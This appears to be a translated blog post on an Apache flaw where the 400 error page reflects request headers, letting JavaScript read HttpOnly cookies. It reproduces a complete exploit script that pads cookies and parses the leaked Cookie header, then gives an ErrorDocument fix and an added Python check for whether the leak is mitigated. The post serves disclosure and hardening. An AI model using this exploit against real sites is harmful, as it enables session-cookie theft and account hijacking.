Many programs, as well as some commercial or mature open-source CMS article systems, set the HttpOnly attribute on cookies to stop XSS from stealing user cookies: it prevents JavaScript from reading the cookie directly and so lowers the impact of XSS. The issue described here happens to allow that HttpOnly attribute to be bypassed.

Open a site in Chrome, press F12 to open the developer tools, go to the console, paste the following code and press Enter:

// http://www.exploit-db.com/exploits/18442/
function setCookies (good) {
    // Construct string for cookie value
    var str = "";
    for (var i=0; i< 819; i++) {
        str += "x";
    }
    // Set cookies
    for (i = 0; i < 10; i++) {
        // Expire evil cookie
        if (good) {
            var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
        }
        // Set evil cookie
        else {
            var cookie = "xss"+i+"="+str+";path=/";
        }
        document.cookie = cookie;
    }
}

function makeRequest() {
    setCookies();
    function parseCookies () {
        var cookie_dict = {};
        // Only react on 400 status
        if (xhr.readyState === 4 && xhr.status === 400) {
            // Replace newlines and match <pre> content
            var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
            if (content && content.length) {
                // Remove Cookie: prefix
                content = content[1].replace("Cookie: ", "");
                var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
                // Add cookies to object
                for (var i=0; i<cookies.length; i++) {
                    var s_c = cookies[i].split('=',2);
                    cookie_dict[s_c[0]] = s_c[1];
                }
            }
            // Unset malicious cookies
            setCookies(true);
            alert(JSON.stringify(cookie_dict));
        }
    }
    // Make XHR request
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = parseCookies;
    xhr.open("GET", "/", true);
    xhr.send(null);
}
makeRequest();

You will then see a glorious 400 error page containing the cookie information.

Download: https://gist.github.com/pilate/1955a1c28324d4724b7b/download

Fix:

Apache officially provides four ways of handling errors (http://httpd.apache.org/docs/2.0/mod/core.html#errordocument), as follows:
In the event of a problem or error, Apache can be configured to do one of four things:

1. output a simple hardcoded error message
2. output a customized message
3. redirect to a local URL-path to handle the problem/error
4. redirect to an external URL to handle the problem/error

Testing shows that, for 400 errors, only method 2 is effective; the response then no longer contains the cookie contents.

Apache configuration:

ErrorDocument 400 "security test"
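To confirm on a captured response that the ErrorDocument change really stops the reflection, here is an added Python check (not part of the original post or of Apache); the two sample 400 bodies are constructed approximations of Apache's default page and of the customized one.

```python
import re

# Constructed approximation of the default Apache 2.2 "400 Bad Request" page,
# which echoes the offending request header inside <pre>. Cookie values are
# made up for this example; the xss0 entry mirrors the padding cookies above.
DEFAULT_400_BODY = """<html><head><title>400 Bad Request</title></head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Size of a request header field exceeds server limit.<br />
<pre>
Cookie: PHPSESSID=abc123; xss0=xxxxxxxxxxxx; auth=secret-token
</pre>
</p></body></html>
"""

# Constructed body served once `ErrorDocument 400 "security test"` is active.
CUSTOM_400_BODY = "security test"

PRE_RE = re.compile(r"<pre>(.*?)</pre>", re.DOTALL)
HEADER_RE = re.compile(r"^([A-Za-z0-9-]+):\s*(.*)$")
PADDING_RE = re.compile(r"^xss\d+=x+$")


def leaked_headers(body):
    """Return {name: value} for request headers echoed inside <pre> of a 400 body."""
    leaked = {}
    for block in PRE_RE.findall(body):
        for line in block.splitlines():
            m = HEADER_RE.match(line.strip())
            if m:
                leaked[m.group(1)] = m.group(2)
    return leaked


def cookie_pairs(cookie_header):
    """Split an echoed Cookie header into name -> value, dropping the xssN padding."""
    pairs = {}
    for item in cookie_header.split(";"):
        item = item.strip()
        if not item or PADDING_RE.match(item):
            continue
        name, _, value = item.partition("=")
        pairs[name] = value
    return pairs


def is_mitigated(body):
    """True when the 400 body no longer reflects the request's Cookie header."""
    return "Cookie" not in leaked_headers(body)
```

Run it against the body of a real 400 response from your own server before and after the configuration change; `cookie_pairs` tells you which genuine cookies (HttpOnly ones included) a default page would have exposed.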

Of course, upgrading Apache to the latest version also works :).

Reference: http://httpd.apache.org/security/vulnerabilities_22.html